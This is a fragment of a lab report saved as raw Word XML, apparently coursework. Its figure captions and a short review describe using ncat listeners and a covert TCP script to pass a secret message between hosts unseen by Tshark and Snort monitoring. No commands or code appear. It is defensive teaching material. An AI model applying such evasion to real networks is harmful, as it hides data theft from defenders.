    <w:p w14:paraId="33CCBABF" w14:textId="26B8FA26" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.8 – Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener on port 10000 on host 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC5F998" w14:textId="77777777" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7"/>
    <w:p w14:paraId="0881F44D" w14:textId="243A975A" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7">
      <w:r w:rsidRPr="003153AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76CD2BFD" wp14:editId="381D7003">
            <wp:extent cx="4620270" cy="1257475"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="139377125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771259" name="Picture 1" descr="A black screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4620270" cy="1257475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D6E68D" w14:textId="4A91A175" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.9 – Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on 10000 and send the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>message  ‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>secret message’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE0C45" w14:textId="77777777" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7"/>
    <w:p w14:paraId="104215C3" w14:textId="400E5C3D" w:rsidR="003153AE" w:rsidRDefault="003153AE" w:rsidP="004271F7">
      <w:r w:rsidRPr="003153AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01F56834" wp14:editId="1BB42024">
            <wp:extent cx="6858000" cy="1978660"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="366945291"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945291" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1978660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C8CCA" w14:textId="3FEF8794" w:rsidR="003153AE" w:rsidRDefault="003A0986" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.10 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> captures the secret message sent both as well as host 2 with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> captures it as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321CA90C" w14:textId="77777777" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="004271F7"/>
    <w:p w14:paraId="2FE3E828" w14:textId="77777777" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="004271F7"/>
    <w:p w14:paraId="12830015" w14:textId="620053E5" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="004271F7">
      <w:r w:rsidRPr="00D2638B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419F630A" wp14:editId="1AA75139">
            <wp:extent cx="4810796" cy="943107"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="900416850"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16850" name="Picture 1" descr="A black screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4810796" cy="943107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEE271B" w14:textId="656F843D" w:rsidR="003A0986" w:rsidRDefault="003A0986" w:rsidP="004271F7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 4.11- Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory for received </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>messages</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A361A53" w14:textId="77777777" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="004271F7"/>
    <w:p w14:paraId="1DC58964" w14:textId="46AAA896" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="004271F7">
      <w:r w:rsidRPr="00D2638B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C124FAC" wp14:editId="3B69B5BC">
            <wp:extent cx="6858000" cy="2288540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="198536059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360593" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2288540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48194271" w14:textId="0E3812E2" w:rsidR="00D2638B" w:rsidRDefault="003A0986" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.12 – Run a convert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script </w:t>
      </w:r>
      <w:r w:rsidR="006477BA">
        <w:t>on local host for ports 10000 and 20000 on anything /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006477BA">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006477BA">
        <w:t>/receive/file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63427EA8" w14:textId="77777777" w:rsidR="006477BA" w:rsidRDefault="006477BA" w:rsidP="004271F7"/>
    <w:p w14:paraId="62B7DA0C" w14:textId="3362D31C" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="004271F7">
      <w:r w:rsidRPr="00D2638B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7149B0FC" wp14:editId="3317AF41">
            <wp:extent cx="4191585" cy="962159"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="254911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11662" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4191585" cy="962159"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A309E3B" w14:textId="0D91A5C5" w:rsidR="006477BA" w:rsidRDefault="006477BA" w:rsidP="004271F7">
      <w:r>
        <w:t>Figure 4.13 – Make the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/send directory on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> host 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA333C8" w14:textId="77777777" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="004271F7"/>
    <w:p w14:paraId="76E77D0D" w14:textId="39E2F4D9" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="004271F7">
      <w:r w:rsidRPr="00D2638B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52D80511" wp14:editId="44474E05">
            <wp:extent cx="4810796" cy="905001"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="78558200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82001" name="Picture 1" descr="A black background with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4810796" cy="905001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="071AD8C4" w14:textId="2DD26576" w:rsidR="006477BA" w:rsidRDefault="006477BA" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.14 – Send the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> message with the message secret message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C9AF72" w14:textId="13EAFE45" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="004271F7">
      <w:r w:rsidRPr="00D2638B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="392949E0" wp14:editId="0003E1AF">
            <wp:extent cx="4629796" cy="4391638"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="135171094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710946" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4629796" cy="4391638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CFBF51" w14:textId="77F4CBBD" w:rsidR="006477BA" w:rsidRDefault="006477BA" w:rsidP="004271F7">
      <w:r>
        <w:t>Figure 4.15 – The data is encoded then decoded to host two, who can see the sent message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0027DBD9" w14:textId="77777777" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="004271F7"/>
    <w:p w14:paraId="22234FA0" w14:textId="053900B5" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="004271F7">
      <w:r w:rsidRPr="00D2638B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F29AE27" wp14:editId="7D0B0753">
            <wp:extent cx="4925112" cy="1962424"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43351873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18732" name="Picture 1" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4925112" cy="1962424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006477BA">
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BFC32D" w14:textId="1AA29D38" w:rsidR="006477BA" w:rsidRPr="004271F7" w:rsidRDefault="006477BA" w:rsidP="004271F7">
      <w:r>
        <w:t xml:space="preserve">Figure 4.16 – By using the covert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script and protecting said shared directory, host one did not capture the event and it went unseen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF18444" w14:textId="77777777" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="00D85544">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC0AF43" w14:textId="77777777" w:rsidR="00D2638B" w:rsidRDefault="00D2638B" w:rsidP="00D85544">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60552614" w14:textId="7B6C2B29" w:rsidR="00D85544" w:rsidRDefault="00D85544" w:rsidP="00D85544">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2C573" w14:textId="033EA5E8" w:rsidR="00D85544" w:rsidRDefault="00D85544" w:rsidP="00D85544">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc145876486"/>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.2 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Technical Review – </w:t>
      </w:r>
      <w:r w:rsidR="003E080B" w:rsidRPr="003E080B">
        <w:t>Covert Channels/Evasion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="6143BC1D" w14:textId="73DC08D8" w:rsidR="00191684" w:rsidRPr="00191684" w:rsidRDefault="00191684" w:rsidP="00191684">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The usage of covert channels and evasion are a critical path for any potential attacker.  By understanding these types of evasion tactics, blue teams can build counter measures to avoid evasion.  In this case, the usage of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and snort rules were a vital part in tracking key words and listeners.  The usage of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as well for building out listeners was critical in the usage with covert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scripts to hide on said ports.  Having properly blocked port controls, advanced snort rulesets and avoidance of such attack methods as covert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will prevent potential attackers from hiding their points of attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0ABD6C" w14:textId="287DB41B" w:rsidR="00D85544" w:rsidRDefault="00D85544" w:rsidP="00D85544">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1785"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C3B28E" w14:textId="545A08A6" w:rsidR="00041D04" w:rsidRDefault="00D85544" w:rsidP="00041D04">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D85544">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47C5D4" w14:textId="58201475" w:rsidR="004D6E19" w:rsidRDefault="00D85544" w:rsidP="004D6E19">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc145876487"/>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="004D6E19">
        <w:t xml:space="preserve">.0 </w:t>
      </w:r>
      <w:r w:rsidR="004D6E19">
        <w:tab/>
        <w:t>References:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1209F322" w14:textId="77777777" w:rsidR="00255E8B" w:rsidRDefault="00255E8B" w:rsidP="00255E8B"/>
    <w:p w14:paraId="7C1DBB58" w14:textId="71E6E867" w:rsidR="00255E8B" w:rsidRDefault="00255E8B" w:rsidP="00255E8B">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00255E8B">
        <w:t>Shiranthaka</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00255E8B">
        <w:t xml:space="preserve">, S. (2023, May 17). Introduction to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00255E8B">
        <w:t>tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00255E8B">
        <w:t xml:space="preserve">. Medium. </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="00282D9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://infosecwriteups.com/introduction-to-tshark-b425fc86ef0d</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BE1D30F" w14:textId="77777777" w:rsidR="00255E8B" w:rsidRDefault="00255E8B" w:rsidP="00255E8B">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3DCDD7" w14:textId="73C14976" w:rsidR="00255E8B" w:rsidRDefault="00255E8B" w:rsidP="00255E8B">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00255E8B">
        <w:t xml:space="preserve">NCAT users’ guide. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidRPr="00282D9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nmap.org/ncat/guide/index.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00255E8B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402EB990" w14:textId="77777777" w:rsidR="00255E8B" w:rsidRDefault="00255E8B" w:rsidP="00255E8B">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0319535B" w14:textId="019ABBDF" w:rsidR="00255E8B" w:rsidRPr="00255E8B" w:rsidRDefault="00255E8B" w:rsidP="00255E8B">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r w:rsidRPr="00255E8B">
        <w:t xml:space="preserve">Wikimedia Foundation. (2023, March 22). Snort (software). </w:t>
      </w:r>
      <w:r w:rsidRPr="00082497">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Wikipedia. https://en.wikipedia.org/wiki/Snort_(software)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580458B9" w14:textId="77777777" w:rsidR="004D6E19" w:rsidRPr="00255E8B" w:rsidRDefault="004D6E19" w:rsidP="004D6E19">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6893AA13" w14:textId="4F1DE3A1" w:rsidR="004D6E19" w:rsidRPr="00A82F76" w:rsidRDefault="00A82F76" w:rsidP="00A82F76">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1470"/>
        </w:tabs>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82F76">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82F76">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thecybersecurityman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82F76">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, Published by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82F76">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>thecybersecurityman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82F76">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. (2018, March 1). Covert channels: How insiders abuse TCP/IP to create covert channels. The Cybersecurity Man. https://thecybersecurityman.com/2018/03/01/covert-channels-how-insiders-abuse-tcp-ip-to-create-covert-channels/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204720EF" w14:textId="6D261229" w:rsidR="0003243F" w:rsidRPr="00A82F76" w:rsidRDefault="004D6E19" w:rsidP="0003243F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82F76">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B3A0A" w14:textId="29CBA310" w:rsidR="009D6A10" w:rsidRDefault="00D85544" w:rsidP="006F18EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc334629032"/>
      <w:bookmarkStart w:id="18" w:name="_Toc334693197"/>
      <w:bookmarkStart w:id="19" w:name="_Toc335936748"/>
      <w:bookmarkStart w:id="20" w:name="_Toc211093306"/>
      <w:bookmarkStart w:id="21" w:name="_Toc211093399"/>
      <w:bookmarkStart w:id="22" w:name="_Toc145876488"/>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="005377C1">
        <w:t>.0</w:t>
      </w:r>
      <w:r w:rsidR="4F55B2D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0075659C">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00247A3A">
        <w:t>Activity</w:t>
      </w:r>
      <w:r w:rsidR="009D6A10">
        <w:t xml:space="preserve"> Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>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047105F9" w:rsidR="009D6A10" w:rsidRPr="00F160C0" w:rsidRDefault="00D94693" w:rsidP="00F160C0">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9/</w:t>
            </w:r>
            <w:r w:rsidR="00341037">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>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62"/>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488BA" w14:textId="77777777" w:rsidR="0021604B" w:rsidRDefault="0021604B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A9C5D2F" w14:textId="77777777" w:rsidR="0021604B" w:rsidRDefault="00216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E8C32" w14:textId="77777777" w:rsidR="0021604B" w:rsidRDefault="0021604B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="61ED310A" w14:textId="77777777" w:rsidR="0021604B" w:rsidRDefault="00216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243F"/>
    <w:rsid w:val="000376FC"/>
    <w:rsid w:val="00037835"/>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407A"/>
    <w:rsid w:val="001143C8"/>
    <w:rsid w:val="00120667"/>
    <w:rsid w:val="00132805"/>
    <w:rsid w:val="00134345"/>
    <w:rsid w:val="00135982"/>
    <w:rsid w:val="00140BFB"/>
    <w:rsid w:val="00140DA2"/>
    <w:rsid w:val="00140E71"/>
    <w:rsid w:val="00141C66"/>
    <w:rsid w:val="0014376F"/>
    <w:rsid w:val="00150D6C"/>
    <w:rsid w:val="00151ABD"/>
    <w:rsid w:val="00153D09"/>
    <w:rsid w:val="001625D2"/>
    <w:rsid w:val="00165CAC"/>
    <w:rsid w:val="00170E49"/>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C"/>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604B"/>
    <w:rsid w:val="00220F2D"/>
    <w:rsid w:val="00221A38"/>
    <w:rsid w:val="00226554"/>
    <w:rsid w:val="00230D42"/>
    <w:rsid w:val="0023106F"/>
    <w:rsid w:val="00235EC0"/>
    <w:rsid w:val="00237A56"/>
    <w:rsid w:val="002436B4"/>
    <w:rsid w:val="0024454D"/>
    <w:rsid w:val="00247A3A"/>
    <w:rsid w:val="00251483"/>
